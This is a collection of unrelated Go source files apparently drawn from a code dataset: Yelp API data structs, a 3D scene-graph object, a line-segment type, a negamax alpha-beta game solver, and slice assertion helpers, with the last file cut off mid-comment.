// Review data contains a list of user reviews for a given Business (when queried using the Business API).
type Review struct {
ID string // Review identifier
Rating float32 // Rating from 1-5
RatingImageURL string `json:"Rating_image_URL"` // URL to star rating image for this business (size = 84x17)
RatingImageSmallURL string `json:"Rating_image_small_URL"` // URL to small version of rating image for this business (size = 50x10)
RatingImageLargeURL string `json:"Rating_image_large_URL"` // URL to large version of rating image for this business (size = 166x30)
Excerpt string // Review excerpt
TimeCreated float32 `json:"Time_created"` // Time created (Unix timestamp)
User User // User who wrote the review
}
// User data is linked off of reviews.
type User struct {
ID string // User identifier
ImageURL string `json:"Image_URL"` // User profile image URL
Name string // User name
}
// Coordinate data is used with location information.
type Coordinate struct {
Latitude float32 // Latitude of current location
Longitude float32 // Longitude of current location
}
// Location information defines the location of a given business.
type Location struct {
Coordinate Coordinate // Address for this business formatted for display. Includes all address fields, cross streets and city, state_code, etc.
Address []string // Address for this business. Only includes address fields.
DisplayAddress []string `json:"Display_address"` // Display address for the business.
City string // City for this business
StateCode string `json:"State_code"` // ISO 3166-2 state code for this business
PostalCode string `json:"Postal_code"` // Postal code for this business
CountryCode string `json:"Country_code"` // ISO 3166-1 country code for this business
CrossStreets string `json:"Cross_streets"` // Cross streets for this business
Neighborhoods []string // List that provides neighborhood(s) information for business
GeoAccuracy float32 `json:"Geo_accuracy"` // Geo accuracy for the location.
}
// Business information is returned in full from the business API, or shallow from the search API.
type Business struct {
ID string // Yelp ID for this business
Name string // Name of this business
ImageURL string `json:"Image_URL"` // URL of photo for this business
URL string // URL for business page on Yelp
MobileURL string `json:"Mobile_URL"` // URL for mobile business page on Yelp
Phone string // Phone number for this business with international dialing code (e.g. +442079460000)
DisplayPhone string `json:"Display_phone"` // Phone number for this business formatted for display
ReviewCount int `json:"Review_count"` // Number of reviews for this business
Categories [][]string // Provides a list of category name, alias pairs that this business is associated with. The alias is provided so you can search with the category_filter.
Distance float32 // Distance that business is from search location in meters, if a latitude/longitude is specified.
Rating float32 // Rating for this business (value ranges from 1, 1.5, ... 4.5, 5)
RatingImgURL string `json:"Rating_img_URL"` // URL to star rating image for this business (size = 84x17)
RatingImgURLSmall string `json:"Rating_img_URL_small"` // URL to small version of rating image for this business (size = 50x10)
RatingImgURLLarge string `json:"Rating_img_URL_large"` // URL to large version of rating image for this business (size = 166x30)
SnippetText string `json:"Snippet_text"` // Snippet text associated with this business
SnippetImageURL string `json:"Snippet_image_URL"` // URL of snippet image associated with this business
Location Location // Location data for this business
IsClaimed bool `json:"Is_claimed"` // Whether business has been claimed by a business owner
IsClosed bool `json:"Is_closed"` // Whether business has been (permanently) closed
MenuProvider string `json:"Menu_provider"` // Provider of the menu for this business
MenuDateUpdated float32 `json:"Menu_date_updated"` // Last time this menu was updated on Yelp (Unix timestamp)
Deals []Deal // Deal info for this business (optional: this field is present only if there’s a Deal)
GiftCertificates []GiftCertificate `json:"Gift_certificates"` // Gift certificate info for this business (optional: this field is present only if there are gift certificates available)
Reviews []Review // Contains one review associated with business
} | vendor/github.com/JustinBeckwith/go-yelp/yelp/business.go | 0.694406 | 0.455017 | business.go | starcoder |
package core
import (
"github.com/nuberu/engine/event"
"github.com/nuberu/engine/math"
)
const (
defaultMatrixAutoUpdate bool = true
)
var (
object3IdGenerator = new(IdGenerator)
)
type CameraObject interface {
IsCamera() bool
}
type Object3 struct {
id Id
Name string
parent *Object3
children []*Object3
up math.Vector3
Position math.Vector3
Rotation math.Euler
quaternion math.Quaternion
Scale math.Vector3
modelViewMatrix math.Matrix4
normalMatrix math.Matrix4
matrix math.Matrix4
matrixWorld math.Matrix4
matrixAutoUpdate bool
matrixWorldNeedsUpdate bool
layers Layers
Visible bool
castShadow bool
receiveShadow bool
frustumCulled bool
RenderOrder uint
beforeRenderEvent *event.Emitter
afterRenderEvent *event.Emitter
addEvent *event.Emitter // Event fired when the object is added to other
removeEvent *event.Emitter // Event fired when the object is removed from other
}
// NewObject creates an Object3 with a fresh unique id and default transform
// (identity matrices, position at the origin, unit scale, +Y up).
func NewObject() *Object3 {
	return newObjectWithId(object3IdGenerator.Next())
}
// newObjectWithId builds an Object3 with the given id and default state,
// and wires the rotation change handlers.
func newObjectWithId(id Id) *Object3 {
	obj := &Object3{
		id:                     id,
		Name:                   "",
		parent:                 nil,
		children:               []*Object3{},
		up:                     *math.NewVector3(0, 1, 0),
		Position:               math.Vector3{Vector2: math.Vector2{X: 0, Y: 0}, Z: 0},
		Rotation:               *math.NewDefaultEuler(),
		quaternion:             *math.NewDefaultQuaternion(),
		Scale:                  math.Vector3{Vector2: math.Vector2{X: 1.0, Y: 1.0}, Z: 1.0},
		modelViewMatrix:        *math.NewDefaultMatrix4(),
		normalMatrix:           *math.NewDefaultMatrix4(),
		matrix:                 *math.NewDefaultMatrix4(),
		matrixWorld:            *math.NewDefaultMatrix4(),
		matrixAutoUpdate:       defaultMatrixAutoUpdate,
		matrixWorldNeedsUpdate: false,
		layers:                 Layers{mask: 0},
		Visible:                true,
		castShadow:             false,
		receiveShadow:          false,
		frustumCulled:          true,
		RenderOrder:            0,
		beforeRenderEvent:      event.NewEvent(),
		afterRenderEvent:       event.NewEvent(),
		addEvent:               event.NewEvent(),
		removeEvent:            event.NewEvent(),
	}
	// Subscribe the (currently empty) sync callbacks so Euler/quaternion
	// changes can be observed.
	obj.Rotation.OnChange().Always(obj.onEulerChange)
	obj.quaternion.OnChange().Always(obj.onQuaternionChange)
	return obj
}
// GetId returns the unique id assigned when the object was created.
func (obj *Object3) GetId() Id {
	return obj.id
}
// IsCamera reports whether this node is a camera; plain objects are not.
func (obj *Object3) IsCamera() bool {
	return false
}
// IsVisible returns the current value of the Visible flag.
func (obj *Object3) IsVisible() bool {
	return obj.Visible
}
// OnBeforeRender returns the handler for the event fired before rendering.
func (obj *Object3) OnBeforeRender() *event.Handler {
	return obj.beforeRenderEvent.GetHandler()
}
// OnAfterRender returns the handler for the event fired after rendering.
func (obj *Object3) OnAfterRender() *event.Handler {
	return obj.afterRenderEvent.GetHandler()
}
// onQuaternionChange is invoked whenever the quaternion changes.
// Currently a no-op placeholder (registered in newObjectWithId).
func (obj *Object3) onQuaternionChange(sender interface{}, args *event.Args) {
}
// onEulerChange is invoked whenever the Rotation euler changes.
// Currently a no-op placeholder (registered in newObjectWithId).
func (obj *Object3) onEulerChange(sender interface{}, args *event.Args) {
}
// ApplyMatrix pre-multiplies the local matrix by the given matrix and
// decomposes the result back into Position, quaternion and Scale.
// NOTE(review): Rotation (the Euler) is not updated here — confirm whether
// it should be kept in sync with the quaternion.
func (obj *Object3) ApplyMatrix(matrix *math.Matrix4) {
	obj.matrix.MultiplyMatrices(matrix, &obj.matrix)
	obj.matrix.DeCompose(&obj.Position, &obj.quaternion, &obj.Scale)
}
// ApplyQuaternion pre-multiplies the object's quaternion by q.
func (obj *Object3) ApplyQuaternion(q *math.Quaternion) {
	obj.quaternion.PreMultiply(q)
}
// SetRotationFromAxisAngle sets the rotation from an axis and an angle.
func (obj *Object3) SetRotationFromAxisAngle(axis *math.Vector3, angle math.Angle) {
	obj.quaternion.SetFromAxisAngle(axis, angle)
}
// SetRotationFromEuler sets the rotation from Euler angles.
func (obj *Object3) SetRotationFromEuler(euler *math.Euler) {
	obj.quaternion.SetFromEuler(euler, true)
}
// SetRotationFromMatrix sets the rotation from the rotation part of m.
func (obj *Object3) SetRotationFromMatrix(m *math.Matrix4) {
	obj.quaternion.SetFromRotationMatrix(m)
}
// SetRotationFromQuaternion copies q into the object's quaternion.
func (obj *Object3) SetRotationFromQuaternion(q *math.Quaternion) {
	obj.quaternion.Copy(q)
}
// RotateOnAxis rotates the object around axis (object space) by angle.
func (obj *Object3) RotateOnAxis(axis *math.Vector3, angle math.Angle) {
	q1 := math.NewDefaultQuaternion()
	q1.SetFromAxisAngle(axis, angle)
	// Post-multiplying applies the rotation in the object's local space.
	obj.quaternion.Multiply(q1)
}
// RotateOnWorldAxis rotates the object around axis (world space) by angle.
func (obj *Object3) RotateOnWorldAxis(axis *math.Vector3, angle math.Angle) {
	q1 := math.NewDefaultQuaternion()
	q1.SetFromAxisAngle(axis, angle)
	// Pre-multiplying applies the rotation in world space.
	obj.quaternion.PreMultiply(q1)
}
// RotateX rotates the object around its local X axis by angle.
func (obj *Object3) RotateX(angle math.Angle) {
	obj.RotateOnAxis(math.NewVector3(1, 0, 0), angle)
}
// RotateY rotates the object around its local Y axis by angle.
func (obj *Object3) RotateY(angle math.Angle) {
	obj.RotateOnAxis(math.NewVector3(0, 1, 0), angle)
}
// RotateZ rotates the object around its local Z axis by angle.
func (obj *Object3) RotateZ(angle math.Angle) {
	obj.RotateOnAxis(math.NewVector3(0, 0, 1), angle)
}
// TranslateOnAxis moves the object by distance along axis, where axis is
// given in the object's local space: it is rotated by the current
// quaternion before being added to Position.
func (obj *Object3) TranslateOnAxis(axis *math.Vector3, distance float32) {
	tmp := axis.Clone()
	tmp.ApplyQuaternion(&obj.quaternion)
	tmp.MultiplyScalar(distance)
	obj.Position.Add(tmp)
}
// TranslateX moves the object by distance along its local X axis.
func (obj *Object3) TranslateX(distance float32) {
	obj.TranslateOnAxis(math.NewVector3(1, 0, 0), distance)
}
// TranslateY moves the object by distance along its local Y axis.
func (obj *Object3) TranslateY(distance float32) {
	obj.TranslateOnAxis(math.NewVector3(0, 1, 0), distance)
}
// TranslateZ moves the object by distance along its local Z axis.
func (obj *Object3) TranslateZ(distance float32) {
	obj.TranslateOnAxis(math.NewVector3(0, 0, 1), distance)
}
// LocalToWorld converts vector (in place) from this object's local space
// to world space using the cached matrixWorld.
func (obj *Object3) LocalToWorld(vector *math.Vector3) {
	vector.ApplyMatrix4(&obj.matrixWorld)
}
// WorldToLocal converts vector (in place) from world space to this
// object's local space by applying the inverse of matrixWorld.
func (obj *Object3) WorldToLocal(vector *math.Vector3) {
	m1 := math.NewDefaultMatrix4()
	m1.SetInverseOf(&obj.matrixWorld, false)
	vector.ApplyMatrix4(m1)
}
// LookAtComponents is a convenience wrapper around LookAt that takes the
// target point as separate coordinates.
func (obj *Object3) LookAtComponents(x, y, z float32) {
	obj.LookAt(math.NewVector3(x, y, z))
}
// LookAt rotates the object so it faces the world-space point x, keeping
// obj.up as the up reference. Cameras look down their negative Z axis, so
// the eye/target arguments are swapped for them.
func (obj *Object3) LookAt(x *math.Vector3) {
	q1 := math.NewDefaultQuaternion()
	m1 := math.NewDefaultMatrix4()
	// BUG FIX: the target must be the requested point x. Previously a
	// zero vector was used, so the object always looked at the origin.
	target := x.Clone()
	position := math.NewDefaultVector3()
	obj.updateWorldMatrix(true, false)
	position.SetFromMatrixPosition(&obj.matrixWorld)
	if obj.IsCamera() {
		m1.LookAt(position, target, &obj.up)
	} else {
		m1.LookAt(target, position, &obj.up)
	}
	obj.quaternion.SetFromRotationMatrix(m1)
	// The rotation above is in world space; if the object has a parent,
	// cancel the parent's world rotation so the local quaternion is correct.
	if obj.parent != nil {
		m1.ExtractRotation(&obj.parent.matrixWorld)
		q1.SetFromRotationMatrix(m1)
		q1.Inverse()
		obj.quaternion.PreMultiply(q1)
	}
}
// Add attaches object as a child of obj. If object already has a parent it
// is detached from it first. The object's add event is emitted with obj as
// the sender.
func (obj *Object3) Add(object *Object3) {
	if p := object.parent; p != nil {
		p.Remove(object)
	}
	object.parent = obj
	object.addEvent.Emit(obj, nil)
	obj.children = append(obj.children, object)
}
// AddAll attaches every element of objects as a child of obj.
func (obj *Object3) AddAll(objects []*Object3) {
	for _, o := range objects {
		obj.Add(o)
	}
}
// Remove detaches object from obj's children, clearing its parent pointer
// and emitting its remove event. A no-op when object is not a child.
func (obj *Object3) Remove(object *Object3) {
	for i, child := range obj.children {
		if child == object {
			object.parent = nil
			object.removeEvent.Emit(obj, nil)
			obj.children = append(obj.children[:i], obj.children[i+1:]...)
			// BUG FIX: return after the removal. The old code kept
			// ranging over the slice it had just mutated in place, so
			// the remaining iterations inspected shifted elements.
			return
		}
	}
}
// RemoveAll detaches every element of objects from obj.
func (obj *Object3) RemoveAll(objects []*Object3) {
	for _, object := range objects {
		obj.Remove(object)
	}
}
// GetParent returns the parent node, or nil for a root object.
func (obj *Object3) GetParent() *Object3 {
	return obj.parent
}
// GetChildren returns a copy of the direct-children slice, so callers
// cannot mutate the internal list.
func (obj *Object3) GetChildren() []*Object3 {
	castChildren := make([]*Object3, len(obj.children))
	copy(castChildren, obj.children)
	return castChildren
}
// GetChildrenById searches the whole subtree (depth-first) for a descendant
// with the given id and returns it, or nil when no descendant matches.
func (obj *Object3) GetChildrenById(id Id) *Object3 {
	for _, child := range obj.children {
		if child.id == id {
			return child
		}
		// BUG FIX: only return early when the recursive search actually
		// found a match. The old code returned the first child's result
		// unconditionally, so all remaining siblings were never visited.
		if found := child.GetChildrenById(id); found != nil {
			return found
		}
	}
	return nil
}
// GetChildrenByName searches the whole subtree (depth-first) for a
// descendant whose Name equals name and returns it, or nil if none matches.
func (obj *Object3) GetChildrenByName(name string) *Object3 {
	for _, child := range obj.children {
		if child.Name == name {
			return child
		}
		// BUG FIX: keep scanning the remaining siblings when the first
		// child's subtree does not contain the name; the old code
		// returned that (possibly nil) result immediately.
		if found := child.GetChildrenByName(name); found != nil {
			return found
		}
	}
	return nil
}
// GetWorldPosition returns a new vector with the object's world position.
func (obj *Object3) GetWorldPosition() *math.Vector3 {
	target := math.NewDefaultVector3()
	obj.CopyWorldPosition(target)
	return target
}
// CopyWorldPosition writes the object's world position into target after
// refreshing matrixWorld.
func (obj *Object3) CopyWorldPosition(target *math.Vector3) {
	obj.UpdateMatrixWorld(true)
	target.SetFromMatrixPosition(&obj.matrixWorld)
}
// GetWorldQuaternion returns a new quaternion with the world rotation.
func (obj *Object3) GetWorldQuaternion() *math.Quaternion {
	target := math.NewDefaultQuaternion()
	obj.CopyWorldQuaternion(target)
	return target
}
// CopyWorldQuaternion writes the object's world rotation into target by
// decomposing the refreshed matrixWorld (position/scale are discarded).
func (obj *Object3) CopyWorldQuaternion(target *math.Quaternion) {
	position := math.NewDefaultVector3()
	scale := math.NewDefaultVector3()
	obj.UpdateMatrixWorld(true)
	obj.matrixWorld.DeCompose(position, target, scale)
}
// GetWorldScale returns a new vector with the object's world scale.
func (obj *Object3) GetWorldScale() *math.Vector3 {
	target := math.NewDefaultVector3()
	obj.CopyWorldScale(target)
	return target
}
// CopyWorldScale writes the object's world scale into target by
// decomposing the refreshed matrixWorld (position/rotation are discarded).
func (obj *Object3) CopyWorldScale(target *math.Vector3) {
	position := math.NewDefaultVector3()
	quaternion := math.NewDefaultQuaternion()
	obj.UpdateMatrixWorld(true)
	obj.matrixWorld.DeCompose(position, quaternion, target)
}
// GetWorldDirection returns a new vector with the normalized world-space
// direction of the object's Z axis.
func (obj *Object3) GetWorldDirection() *math.Vector3 {
	target := math.NewDefaultVector3()
	obj.CopyWorldDirection(target)
	return target
}
// CopyWorldDirection writes the normalized Z-axis column (elements 8..10)
// of the refreshed matrixWorld into target.
func (obj *Object3) CopyWorldDirection(target *math.Vector3) {
	obj.UpdateMatrixWorld(true)
	e := obj.matrixWorld.GetElements()
	target.Set(e[8], e[9], e[10])
	target.Normalize()
}
// TraverseIterator returns an iterator over the whole subtree of obj.
// With onlyVisible set, invisible nodes are filtered out.
func (obj *Object3) TraverseIterator(onlyVisible bool) *object3Iterator {
	return &object3Iterator{
		current: -1,
		data:    obj.allChildren(onlyVisible),
	}
}
// allChildren collects the object's descendants depth-first: the direct
// children first, then each child's own descendants. With onlyVisible set,
// invisible direct children are filtered out (their subtrees are still
// filtered recursively by the same rule).
func (obj *Object3) allChildren(onlyVisible bool) []*Object3 {
	var ch []*Object3
	// BUG FIX: the previous version used ":=" inside both branches, which
	// shadowed the outer ch (leaving it nil), and the visible branch ranged
	// over the freshly created empty slice instead of obj.children.
	if onlyVisible {
		for _, child := range obj.children {
			if child.Visible {
				ch = append(ch, child)
			}
		}
	} else {
		ch = make([]*Object3, len(obj.children))
		copy(ch, obj.children)
	}
	for _, child := range obj.children {
		ch = append(ch, child.allChildren(onlyVisible)...)
	}
	return ch
}
// TraverseAncestorsIterator returns an iterator over obj's ancestors,
// ordered from the root of the tree down to the direct parent.
func (obj *Object3) TraverseAncestorsIterator() *object3Iterator {
	return &object3Iterator{
		current: -1,
		data:    obj.allParents(),
	}
}
// allParents collects the chain of ancestors of obj, root first.
func (obj *Object3) allParents() []*Object3 {
	chain := []*Object3{}
	for p := obj.parent; p != nil; p = p.parent {
		chain = append(chain, p)
	}
	// chain is nearest-parent first; reverse so the root comes first.
	for i, j := 0, len(chain)-1; i < j; i, j = i+1, j-1 {
		chain[i], chain[j] = chain[j], chain[i]
	}
	return chain
}
// Clone returns a new object (with a fresh id) whose state is copied from
// obj. With recursive set, the whole subtree is cloned as well.
func (obj *Object3) Clone(recursive bool) *Object3 {
	no := NewObject()
	no.Copy(obj, recursive)
	return no
}
// Copy copies source's transform and flags into obj; pass recursive=true to
// also clone and attach source's children.
// NOTE(review): the quaternion is copied but the Rotation euler is not —
// confirm whether Rotation should be synced here as well.
func (obj *Object3) Copy(source *Object3, recursive bool) {
	obj.Name = source.Name
	obj.up = *source.up.Clone()
	obj.Position = *source.Position.Clone()
	obj.quaternion = *source.quaternion.Clone()
	obj.Scale = *source.Scale.Clone()
	obj.matrix = *source.matrix.Clone()
	obj.matrixWorld = *source.matrixWorld.Clone()
	obj.matrixAutoUpdate = source.matrixAutoUpdate
	obj.matrixWorldNeedsUpdate = source.matrixWorldNeedsUpdate
	obj.layers.mask = source.layers.mask
	obj.Visible = source.Visible
	obj.castShadow = source.castShadow
	obj.receiveShadow = source.receiveShadow
	obj.frustumCulled = source.frustumCulled
	obj.RenderOrder = source.RenderOrder
	if recursive {
		// Each child is cloned (new ids) and re-parented onto obj via Add.
		for _, child := range source.children {
			obj.Add(child.Clone(recursive))
		}
	}
}
// UpdateMatrix recomposes the local matrix from Position, quaternion and
// Scale, and flags the world matrix as stale.
func (obj *Object3) UpdateMatrix() {
	obj.matrix.Compose(&obj.Position, &obj.quaternion, &obj.Scale)
	obj.matrixWorldNeedsUpdate = true
}
// UpdateMatrixWorld refreshes matrixWorld for this object and, when it (or
// an ancestor, via force) changed, for the whole subtree below it.
func (obj *Object3) UpdateMatrixWorld(force bool) {
	if obj.matrixAutoUpdate {
		obj.UpdateMatrix()
	}
	if obj.matrixWorldNeedsUpdate || force {
		if obj.parent == nil {
			// Root: the world matrix is just the local matrix.
			obj.matrixWorld.Copy(&obj.matrix)
		} else {
			obj.matrixWorld.MultiplyMatrices(&obj.parent.matrixWorld, &obj.matrix)
		}
		obj.matrixWorldNeedsUpdate = false
		// Our world matrix changed, so all descendants must refresh too.
		force = true
	}
	// update children
	for _, child := range obj.children {
		child.UpdateMatrixWorld(force)
	}
}
// updateWorldMatrix refreshes matrixWorld, optionally refreshing the
// ancestor chain first (updateParents) and/or the whole subtree afterwards
// (updateChildren). Unlike UpdateMatrixWorld it ignores the dirty flag and
// always recomputes.
func (obj *Object3) updateWorldMatrix(updateParents, updateChildren bool) {
	// Idiomatic cleanup: compare booleans directly instead of "== true",
	// and iterate children with range instead of an index loop.
	if updateParents && obj.parent != nil {
		obj.parent.updateWorldMatrix(true, false)
	}
	if obj.matrixAutoUpdate {
		obj.UpdateMatrix()
	}
	if obj.parent == nil {
		obj.matrixWorld.Copy(&obj.matrix)
	} else {
		obj.matrixWorld.MultiplyMatrices(&obj.parent.matrixWorld, &obj.matrix)
	}
	// update children
	if updateChildren {
		for _, child := range obj.children {
			child.updateWorldMatrix(false, true)
		}
	}
}
// GetMatrixWorld returns a pointer to the cached world matrix. The caller
// is responsible for calling UpdateMatrixWorld first if it may be stale.
func (obj *Object3) GetMatrixWorld() *math.Matrix4 {
	return &obj.matrixWorld
}
// object3Iterator walks a pre-collected slice of objects. Use Next to
// advance and Value to read the current element.
type object3Iterator struct {
	current int        // index of the current element; -1 before first Next
	data    []*Object3 // snapshot of the objects to iterate
}
// Value returns the element at the iterator's current position. Only valid
// after Next has returned true.
func (it *object3Iterator) Value() *Object3 {
	return it.data[it.current]
}
func (it *object3Iterator) Next() bool {
it.current++
if it.current >= len(it.data) {
return false
}
return true
} | core/object3.go | 0.729327 | 0.449574 | object3.go | starcoder |
package math32
// Line3 represents a 3D line segment defined by a start and an end point.
type Line3 struct {
	start Vector3 // first endpoint
	end   Vector3 // second endpoint
}
// NewLine3 creates and returns a pointer to a new Line3 with the
// specified start and end points. A nil start or end leaves the
// corresponding endpoint at the zero vector (see Set).
func NewLine3(start, end *Vector3) *Line3 {
	l := new(Line3)
	l.Set(start, end)
	return l
}
// OperateOnVertices iterates over both endpoints (start, then end) and
// calls the specified callback function with a pointer to each vertex.
// The vertex pointers can be modified inside the callback and the
// modifications are applied to the segment immediately.
// The callback function returns false to continue or true to break.
//
// Consistency fix: the receiver is named l like every other Line3 method
// (it was previously t), and the "== true" comparisons are dropped.
func (l *Line3) OperateOnVertices(cb func(vertex *Vector3) bool) {
	if cb(&l.start) {
		return
	}
	cb(&l.end)
}
// ReadVertices iterates over both endpoints (start, then end) and calls
// the specified callback function with the value of each vertex.
// The callback function returns false to continue or true to break.
func (l *Line3) ReadVertices(cb func(vertex Vector3) bool) {
	if cb(l.start) {
		return
	}
	cb(l.end)
}
// Start returns a pointer to the start point of the line segment.
func (l *Line3) Start() *Vector3 {
	return &l.start
}
// End returns a pointer to the end point of the line segment.
func (l *Line3) End() *Vector3 {
	return &l.end
}
// Set sets this line segment's start and end points. A nil argument leaves
// the corresponding endpoint unchanged.
// Returns pointer to this updated line segment.
func (l *Line3) Set(start, end *Vector3) *Line3 {
	if start != nil {
		l.start = *start
	}
	if end != nil {
		l.end = *end
	}
	return l
}
// Copy copies the other line segment into this one.
// Returns pointer to this updated line segment.
func (l *Line3) Copy(other *Line3) *Line3 {
	*l = *other
	return l
}
// Center computes the midpoint of this line segment. The result is stored
// in optionalTarget when it is non-nil; otherwise a new vector is
// allocated. The destination vector is returned in either case.
func (l *Line3) Center(optionalTarget *Vector3) *Vector3 {
	result := optionalTarget
	if result == nil {
		result = NewVector3(0, 0, 0)
	}
	return result.AddVectors(&l.start, &l.end).MultiplyScalar(0.5)
}
// Delta computes the vector from the start to the end point of this line
// segment. The result is stored in optionalTarget when it is non-nil;
// otherwise a new vector is allocated. The destination vector is returned.
func (l *Line3) Delta(optionalTarget *Vector3) *Vector3 {
	result := optionalTarget
	if result == nil {
		result = NewVector3(0, 0, 0)
	}
	return result.SubVectors(&l.end, &l.start)
}
// DistanceSq returns the square of the distance from the start point to
// the end point (cheaper than Distance as it avoids the square root).
func (l *Line3) DistanceSq() float32 {
	return l.start.DistanceToSquared(&l.end)
}
// Distance returns the distance from the start point to the end point.
func (l *Line3) Distance() float32 {
	return l.start.DistanceTo(&l.end)
}
// ApplyMatrix4 applies the specified matrix to this line segment start and end points.
// Returns pointer to this updated line segment.
func (l *Line3) ApplyMatrix4(matrix *Matrix4) *Line3 {
l.start.ApplyMatrix4(matrix)
l.end.ApplyMatrix4(matrix)
return l
}
// Equals returns if this line segement is equal to other.
func (l *Line3) Equals(other *Line3) bool {
return other.start.Equals(&l.start) && other.end.Equals(&l.end)
}
// Clone creates and returns a pointer to a copy of this line segment.
func (l *Line3) Clone() *Line3 {
return NewLine3(&l.start, &l.end)
} | math32/line3.go | 0.915231 | 0.707758 | line3.go | starcoder |
package vulpes
import (
"math"
"sort"
)
const (
	// LOSS means the game is over and the current player has lost the game.
	LOSS = iota
	// TIE means the game is over and ended in a tie.
	TIE
	// WIN means the game is over and the current player has won the game.
	WIN
	// UNFINISHED means the game is not yet over.
	UNFINISHED
)
// Game describes a two-player, zero-sum, turn-based game. Scores are
// always evaluated from the perspective of the player to move.
type Game interface {
	// Children returns the child nodes from this one. If the game is not ended, this must return at least 1 child.
	Children() []Game
	// Evaluate returns an evaluation of the current game state from the perspective of the current player. 'ending' must be one of {LOSS, TIE, WIN, UNFINISHED}. 'heuristic' is only required when ending is UNFINISHED.
	Evaluate() (ending int, heuristic float64)
}
// moveScore pairs a child index with its shallow evaluation, used to order
// moves before the deep search.
type moveScore struct {
	moveIndex int     // index into the children slice
	moveScore float64 // negated depth-0 score of that child
}
// moveScores implements sort.Interface, sorting best (highest) score first.
type moveScores []moveScore
func (s moveScores) Len() int { return len(s) }
// Less sorts descending so the most promising moves are searched first.
func (s moveScores) Less(i, j int) bool { return s[i].moveScore > s[j].moveScore }
func (s moveScores) Swap(i, j int) { s[i], s[j] = s[j], s[i] }
// Search performs a negamax search with fail-hard alpha-beta pruning from
// state down to the given depth, and returns the best immediate child
// (or state itself when the game is over / no moves exist) together with
// its score from the current player's perspective.
func Search(state Game, depth uint, alpha, beta float64) (Game, float64) {
	ending, heuristic := state.Evaluate()
	// Terminal positions score +/-Inf (win/loss) or 0 (tie) immediately.
	switch ending {
	case LOSS:
		return state, math.Inf(-1)
	case TIE:
		return state, 0
	case WIN:
		return state, math.Inf(1)
	}
	if depth == 0 {
		// Depth exhausted: fall back to the heuristic evaluation.
		return state, heuristic
	}
	children := state.Children()
	// NOTE: this local deliberately shadows the moveScores type; the type
	// name on the right-hand side still resolves to the type.
	moveScores := make(moveScores, len(children))
	for i := range children {
		moveScores[i] = moveScore{i, 0.0}
	}
	var tmpScore float64
	if depth > 1 {
		// Pre-sort the possible moves by their score to speed up the pruning
		for i, child := range children {
			// Depth-0 search to force heuristic scoring
			_, tmpScore = Search(child, 0, -beta, -alpha)
			// Negamax: the child's score is from the opponent's view.
			moveScores[i].moveScore = -tmpScore
		}
		sort.Sort(moveScores)
	}
	var bestChild Game
	for _, moveScore := range moveScores {
		child := children[moveScore.moveIndex]
		// Recurse with the window negated and swapped (negamax identity).
		_, tmpScore = Search(child, depth-1, -beta, -alpha)
		tmpScore = -tmpScore
		if tmpScore > alpha {
			alpha = tmpScore
			bestChild = child
			if beta <= alpha {
				// Beta cutoff: fail hard by returning the bound itself.
				return bestChild, beta
			}
		}
		if bestChild == nil {
			// Take the first child, in case all the children are terrible.
			bestChild = child
		}
	}
	if bestChild == nil {
		// No possible moves, so return the current state.
		bestChild = state
	}
	return bestChild, alpha
}
// SolveGame takes a starting node for the game, and returns the best child node and its score, after searching to the specified depth
func SolveGame(state Game, depth uint) (Game, float64) {
return Search(state, depth, math.Inf(-1), math.Inf(1))
} | vulpes.go | 0.562898 | 0.416915 | vulpes.go | starcoder |
package values
import (
"reflect"
"sort"
)
// SliceValue wraps an arbitrary value expected to be a slice or array and
// offers assertion-style predicates on it.
type SliceValue struct {
	value interface{} // the wrapped value; usually a slice or array
}
// IsEqualTo returns true if the value is equal to the expected value, else false.
// Returns false when either side is not a slice/array.
// NOTE(review): element comparison is delegated to areSlicesEqual, which is
// defined elsewhere in this package — confirm its equality semantics.
func (s SliceValue) IsEqualTo(expected interface{}) bool {
	if !IsSlice(expected) || !IsSlice(s.Value()) {
		return false
	}
	actualValue := reflect.ValueOf(s.value)
	expectedValue := reflect.ValueOf(expected)
	return areSlicesEqual(actualValue, expectedValue)
}
// IsEmpty returns true if the slice is empty else false.
func (s SliceValue) IsEmpty() bool {
	return s.Size() == 0
}
// IsNotEmpty returns true if the slice is not empty else false.
func (s SliceValue) IsNotEmpty() bool {
	return s.Size() != 0
}
// HasSize returns true if the slice has the expected size else false.
func (s SliceValue) HasSize(length int) bool {
	return s.Size() == length
}
// Size returns the number of elements in the wrapped slice, or 0 when the
// wrapped value is not a slice or array.
func (s SliceValue) Size() int {
	v := s.Value()
	if !IsSlice(v) {
		return 0
	}
	return reflect.ValueOf(v).Len()
}
// contains reports whether any element of the wrapped slice equals element.
// NOTE(review): equality is delegated to areEqualValues, defined elsewhere
// in this package — confirm its semantics.
func (s SliceValue) contains(element reflect.Value) bool {
	actualValue := reflect.ValueOf(s.Value())
	for i := 0; i < actualValue.Len(); i++ {
		if areEqualValues(actualValue.Index(i), element) {
			return true
		}
	}
	return false
}
// Contains returns true if the slice contains the expected element(s) else false.
// A non-slice argument is treated as a single element; a slice argument
// requires every one of its elements to be present.
func (s SliceValue) Contains(elements interface{}) bool {
	if !IsSlice(s.Value()) {
		return false
	}
	if !IsSlice(elements) {
		return s.contains(reflect.ValueOf(elements))
	}
	expectedValue := reflect.ValueOf(elements)
	all := true
	for i := 0; i < expectedValue.Len(); i++ {
		all = all && s.contains(expectedValue.Index(i))
	}
	return all
}
// DoesNotContain returns true if the slice does not contain the expected element(s) else false.
func (s SliceValue) DoesNotContain(elements interface{}) bool {
	return !s.Contains(elements)
}
// ContainsOnly returns true if the slice contains only the expected
// element(s) else false.
// BUG FIX: a non-slice argument is treated as a single expected element;
// previously reflect.ValueOf(elements).Len() panicked in that case.
func (s SliceValue) ContainsOnly(elements interface{}) bool {
	if !IsSlice(elements) {
		return s.Contains(elements) && s.HasSize(1)
	}
	return s.Contains(elements) && s.HasSize(reflect.ValueOf(elements).Len())
}
// HasUniqueElements returns true if the slice contains only unique elements else false.
// NOTE(review): elements are used as map keys, so non-comparable element
// types (slices, maps, funcs) will panic at runtime — confirm callers only
// pass comparable element types.
func (s SliceValue) HasUniqueElements() bool {
	if !IsSlice(s.Value()) {
		return false
	}
	sliceValue := reflect.ValueOf(s.value)
	// Track every element seen so far; a repeat means non-unique.
	elements := map[interface{}]bool{}
	for i := 0; i < sliceValue.Len(); i++ {
		if _, ok := elements[sliceValue.Index(i).Interface()]; ok {
			return false
		}
		elements[sliceValue.Index(i).Interface()] = true
	}
	return true
}
// IsSorted returns true if the slice is sorted else false. With desc set,
// descending order is checked by reversing first and testing ascending
// order. Supported element types: int, int32, int64, float64, string, or
// any value implementing sort.Interface; anything else returns false.
// NOTE(review): confirm the desc checks do not permanently mutate the
// wrapped slice via the reverse helpers.
